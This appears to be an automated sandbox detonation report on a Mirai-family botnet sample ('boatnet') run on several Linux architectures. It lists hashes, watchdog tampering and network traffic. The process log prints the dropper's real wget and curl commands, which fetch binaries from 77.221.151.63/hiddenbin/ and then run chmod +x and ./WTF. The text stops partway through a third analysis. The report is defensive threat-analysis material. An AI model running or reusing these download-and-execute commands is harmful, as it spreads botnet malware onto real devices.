| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp |
Files
/tmp/boatnet.x86
| MD5 | 895badd48eed0c0e0ba14e8d5967e7bb |
| SHA1 | 3c4c22665e6197841f7e68f941a4a27dca3d4d8d |
| SHA256 | e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4 |
| SHA512 | dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7 |
memory/1522-1-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1530-2-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1538-3-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1546-4-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1554-5-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1562-6-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1570-7-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1578-8-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1586-9-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1594-10-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1604-11-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1618-12-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1650-13-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1658-14-0x0000000008048000-0x00000000080547a0-memory.dmp
memory/1666-15-0x0000000008048000-0x00000000080547a0-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-09 04:10
Reported
2024-11-09 04:12
Platform
debian9-armhf-20240418-en
Max time kernel
148s
Max time network
147s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/844/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/820/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/589/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/803/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/805/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/833/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/856/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/629/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/589/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/840/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/848/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/850/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/self/exe | /tmp/WTF | N/A |
| File opened for reading | /proc/635/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/787/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/571/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/842/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/848/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/634/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/629/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/635/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/636/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/592/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/846/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/856/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/838/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/exe | /tmp/WTF | N/A |
| File opened for reading | /proc/641/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/854/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/636/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/586/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/846/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/850/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/840/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/852/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/858/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/641/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/592/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/787/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/805/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/811/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/811/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/cat | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]
/bin/cat
[cat boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]
/bin/cat
[cat boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]
/bin/cat
[cat boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]
/bin/cat
[cat boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]
/bin/cat
[cat boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]
/bin/cat
[cat boatnet.mpsl]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]
/bin/cat
[cat boatnet.arm]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]
/bin/cat
[cat boatnet.arm5]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]
/bin/cat
[cat boatnet.arm6]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]
/bin/cat
[cat boatnet.arm7]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]
/bin/cat
[cat boatnet.ppc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]
/bin/cat
[cat boatnet.spc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]
/bin/cat
[cat boatnet.m68k]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]
/bin/cat
[cat boatnet.sh4]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 ohshit.sh systemd-private-93d7b374fc444b3f93647d37762560da-systemd-timedated.service-81EbRp WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp |
Files
/tmp/boatnet.x86
| MD5 | 895badd48eed0c0e0ba14e8d5967e7bb |
| SHA1 | 3c4c22665e6197841f7e68f941a4a27dca3d4d8d |
| SHA256 | e2a04bd1fb1e7ed211e3ee19b08337b6361d695278417d5a21ba602ca7eb99b4 |
| SHA512 | dfc79a34d1694b7e4422fa4861bf475b3efe2398df684126e71293880f51f4bf39f396fb5c5e36a2c12944c7406e86cac09c3d3b8c432194aab976c8b7e94af7 |
/tmp/WTF
| MD5 | e3206d28c93769f5acb5e1e1d5b5f219 |
| SHA1 | 198b56e1df06819e1141c1d6e8f7ad7d1646194c |
| SHA256 | cdf3f41e3ad38f3081c882ac25d15d03b9e85b7b7021cbd32a6c504acd353aab |
| SHA512 | dad4a759472131bed86139904962c9ce218dbba129e866fabfb524392e2ef8e77f30087d80305eef0452b5f5e685a5d5103e2ee6518b6b9c103fb55b8cfd3503 |
/tmp/WTF
| MD5 | d94c95baa8be09e30fcdc154241477c8 |
| SHA1 | d0b682898bd94b01afb6ad2f4fb813197f6a0985 |
| SHA256 | 2bcc0d44bafdbdecf7e537c3cf0357ab7f6fa5e7a2820e950e4f33a2ae08c6c6 |
| SHA512 | 7cebf14f7ecfe09c18b161607284a58c771a305b36a4f069493ce813b1cee9bea639412e3fb7d1e492ce889b553ae2512c709b9a3dd2ca86f08b84a07c59e1b9 |
/tmp/WTF
| MD5 | f1c24d9fa40a047ae22d2d3ae7dfeac9 |
| SHA1 | 750274b02d5f5b00026a4f55b020f4285c693533 |
| SHA256 | 219db693bfc6306868548b227030b636aaba7e2b2ad0582a8977ecef92d674bc |
| SHA512 | 36bd34e999eb4426823cadcf27076cf1128470e340172336ac3e3bdf3f194d0c873684f67b8d341df85eeb955e3c9dc3657ad7c5f05525e5c254476605d5b259 |
/tmp/WTF
| MD5 | a8f502a6fb3b7b940e922c951d9e493a |
| SHA1 | fa94d6dade6bb7537ee3f58f2984b80f4b02dcdf |
| SHA256 | 748429c25463cc890809a866bfe2cb313f072be73bf5ea88fb4f65e26aa97bec |
| SHA512 | e4ada74640d3ad58a6181ab1cd05fadd584788806908b00cf80924a19f29118a17f581d72d9abf1aa207f83d1e4ab163ea6c0c1e0ee6f2e211d1e0d366a27338 |
/tmp/WTF
| MD5 | fb08806a49f2c5aa8f8ea71c0ca40395 |
| SHA1 | 411ae81e99b9c3ec9d27514a7c18cb5c63189b22 |
| SHA256 | 2f7082951d3b09a10a5308258951b0d2efe7b1717e543e9d51e53e482d00479c |
| SHA512 | 60c4b894a8b169553d63dc8ec09d51ab447dc8644fd382265580368e09bcd6681525c1ebba1a5b44531015b060a7f9ab831d6319e92366243f94e4e2225c74b3 |
memory/784-1-0x00008000-0x0001dca4-memory.dmp
memory/792-2-0x00008000-0x0001b6e4-memory.dmp
memory/797-3-0x00008000-0x000228c4-memory.dmp
memory/802-4-0x00008000-0x00026464-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-09 04:10
Reported
2024-11-09 04:12
Platform
debian9-mipsbe-20240611-en
Max time kernel
149s
Max time network
146s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/858/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/870/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/781/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/790/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/802/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/797/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/811/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/885/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/428/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/665/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/678/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/832/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
